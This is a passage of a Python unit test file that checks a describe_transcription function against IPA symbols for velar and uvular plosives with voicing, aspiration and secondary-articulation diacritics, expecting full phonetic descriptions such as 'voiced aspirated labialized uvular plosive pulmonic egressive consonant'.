self.assertEqual(actual, expected)
# voiceless palatalized velar plosive pulmonic egressive consonant
def test_kʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʲ")
self.assertEqual(actual, expected)
def test_k̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ʲ")
self.assertEqual(actual, expected)
def test_k̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ʲ")
self.assertEqual(actual, expected)
def test_g̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʲ")
self.assertEqual(actual, expected)
def test_g̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar plosive pulmonic egressive consonant
def test_kˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kˠ")
self.assertEqual(actual, expected)
def test_k̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ˠ")
self.assertEqual(actual, expected)
def test_k̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ˠ")
self.assertEqual(actual, expected)
def test_g̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ˠ")
self.assertEqual(actual, expected)
def test_g̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar plosive pulmonic egressive consonant
def test_kˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kˤ")
self.assertEqual(actual, expected)
def test_k̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ˤ")
self.assertEqual(actual, expected)
def test_k̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ˤ")
self.assertEqual(actual, expected)
def test_g̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ˤ")
self.assertEqual(actual, expected)
def test_g̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar plosive pulmonic egressive consonant
def test_kʰ_is_the_representation_of_the_voiceless_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰ")
self.assertEqual(actual, expected)
def test_g̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰ")
self.assertEqual(actual, expected)
def test_g̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar plosive pulmonic egressive consonant
def test_kʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰʷ")
self.assertEqual(actual, expected)
def test_g̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰʷ")
self.assertEqual(actual, expected)
def test_g̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar plosive pulmonic egressive consonant
def test_kʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰʲ")
self.assertEqual(actual, expected)
def test_g̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰʲ")
self.assertEqual(actual, expected)
def test_g̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar plosive pulmonic egressive consonant
def test_kʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰˠ")
self.assertEqual(actual, expected)
def test_g̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰˠ")
self.assertEqual(actual, expected)
def test_g̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant
def test_kʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰˤ")
self.assertEqual(actual, expected)
def test_g̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰˤ")
self.assertEqual(actual, expected)
def test_g̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar plosive pulmonic egressive consonant
def test_g_is_the_representation_of_the_voiced_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velar plosive pulmonic egressive consonant"
actual = describe_transcription("g")
self.assertEqual(actual, expected)
def test_k̬_is_the_representation_of_the_voiced_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬")
self.assertEqual(actual, expected)
# voiced labialized velar plosive pulmonic egressive consonant
def test_gʷ_is_the_representation_of_the_voiced_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʷ")
self.assertEqual(actual, expected)
def test_k̬ʷ_is_the_representation_of_the_voiced_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar plosive pulmonic egressive consonant
def test_gʲ_is_the_representation_of_the_voiced_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʲ")
self.assertEqual(actual, expected)
def test_k̬ʲ_is_the_representation_of_the_voiced_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized velar plosive pulmonic egressive consonant
def test_gˠ_is_the_representation_of_the_voiced_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gˠ")
self.assertEqual(actual, expected)
def test_k̬ˠ_is_the_representation_of_the_voiced_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar plosive pulmonic egressive consonant
def test_gˤ_is_the_representation_of_the_voiced_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gˤ")
self.assertEqual(actual, expected)
def test_k̬ˤ_is_the_representation_of_the_voiced_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar plosive pulmonic egressive consonant
def test_gʰ_is_the_representation_of_the_voiced_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰ")
self.assertEqual(actual, expected)
def test_g̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰ")
self.assertEqual(actual, expected)
def test_k̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar plosive pulmonic egressive consonant
def test_gʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰʷ")
self.assertEqual(actual, expected)
def test_g̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰʷ")
self.assertEqual(actual, expected)
def test_k̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar plosive pulmonic egressive consonant
def test_gʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰʲ")
self.assertEqual(actual, expected)
def test_g̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰʲ")
self.assertEqual(actual, expected)
def test_k̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar plosive pulmonic egressive consonant
def test_gʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰˠ")
self.assertEqual(actual, expected)
def test_g̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰˠ")
self.assertEqual(actual, expected)
def test_k̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar plosive pulmonic egressive consonant
def test_gʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("gʰˤ")
self.assertEqual(actual, expected)
def test_g̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̬ʰˤ")
self.assertEqual(actual, expected)
def test_k̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̬ʰˤ")
self.assertEqual(actual, expected)
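    # Every velar-plosive case above follows one pattern: a transcription
    # (base letter plus optional diacritics) maps to a single description
    # string. As an illustrative, hedged alternative to one generated method
    # per symbol, the same coverage could be expressed table-driven with
    # subTest; the pairs below are copied verbatim from the cases above.
    # This is a sketch, not part of the generated suite.
    def test_velar_plosive_descriptions_table_driven(self):
        cases = [
            ("kʰ", "voiceless aspirated velar plosive pulmonic egressive consonant"),
            ("g", "voiced velar plosive pulmonic egressive consonant"),
            ("gʷ", "voiced labialized velar plosive pulmonic egressive consonant"),
            ("gʰˤ", "voiced aspirated pharyngealized velar plosive pulmonic egressive consonant"),
        ]
        for transcription, expected in cases:
            with self.subTest(transcription=transcription):
                self.assertEqual(describe_transcription(transcription), expected)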
# voiceless uvular plosive pulmonic egressive consonant
def test_q_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q")
self.assertEqual(actual, expected)
def test_q̊_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊")
self.assertEqual(actual, expected)
def test_q̥_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥")
self.assertEqual(actual, expected)
def test_ɢ̊_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊")
self.assertEqual(actual, expected)
def test_ɢ̥_is_the_representation_of_the_voiceless_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular plosive pulmonic egressive consonant
def test_qʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʷ")
self.assertEqual(actual, expected)
def test_q̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ʷ")
self.assertEqual(actual, expected)
def test_q̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ʷ")
self.assertEqual(actual, expected)
def test_ɢ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʷ")
self.assertEqual(actual, expected)
def test_ɢ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular plosive pulmonic egressive consonant
def test_qʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʲ")
self.assertEqual(actual, expected)
def test_q̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ʲ")
self.assertEqual(actual, expected)
def test_q̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ʲ")
self.assertEqual(actual, expected)
def test_ɢ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʲ")
self.assertEqual(actual, expected)
def test_ɢ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular plosive pulmonic egressive consonant
def test_qˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qˠ")
self.assertEqual(actual, expected)
def test_q̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ˠ")
self.assertEqual(actual, expected)
def test_q̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ˠ")
self.assertEqual(actual, expected)
def test_ɢ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ˠ")
self.assertEqual(actual, expected)
def test_ɢ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular plosive pulmonic egressive consonant
def test_qˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qˤ")
self.assertEqual(actual, expected)
def test_q̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̊ˤ")
self.assertEqual(actual, expected)
def test_q̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̥ˤ")
self.assertEqual(actual, expected)
def test_ɢ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ˤ")
self.assertEqual(actual, expected)
def test_ɢ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular plosive pulmonic egressive consonant
def test_qʰ_is_the_representation_of_the_voiceless_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular plosive pulmonic egressive consonant
def test_qʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰʷ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular plosive pulmonic egressive consonant
def test_qʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰʲ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular plosive pulmonic egressive consonant
def test_qʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰˠ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant
def test_qʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("qʰˤ")
self.assertEqual(actual, expected)
def test_ɢ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɢ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular plosive pulmonic egressive consonant
def test_ɢ_is_the_representation_of_the_voiced_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ")
self.assertEqual(actual, expected)
def test_q̬_is_the_representation_of_the_voiced_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬")
self.assertEqual(actual, expected)
# voiced labialized uvular plosive pulmonic egressive consonant
def test_ɢʷ_is_the_representation_of_the_voiced_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʷ")
self.assertEqual(actual, expected)
def test_q̬ʷ_is_the_representation_of_the_voiced_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular plosive pulmonic egressive consonant
def test_ɢʲ_is_the_representation_of_the_voiced_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʲ")
self.assertEqual(actual, expected)
def test_q̬ʲ_is_the_representation_of_the_voiced_palatalized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular plosive pulmonic egressive consonant
def test_ɢˠ_is_the_representation_of_the_voiced_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢˠ")
self.assertEqual(actual, expected)
def test_q̬ˠ_is_the_representation_of_the_voiced_velarized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular plosive pulmonic egressive consonant
def test_ɢˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢˤ")
self.assertEqual(actual, expected)
def test_q̬ˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular plosive pulmonic egressive consonant
def test_ɢʰ_is_the_representation_of_the_voiced_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰ")
self.assertEqual(actual, expected)
def test_q̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular plosive pulmonic egressive consonant
def test_ɢʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢʰʷ")
self.assertEqual(actual, expected)
def test_ɢ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("ɢ̬ʰʷ")
self.assertEqual(actual, expected)
def test_q̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular plosive pulmonic egressive consonant"
actual = describe_transcription("q̬ʰʷ")
self.assertEqual(actual, expected)
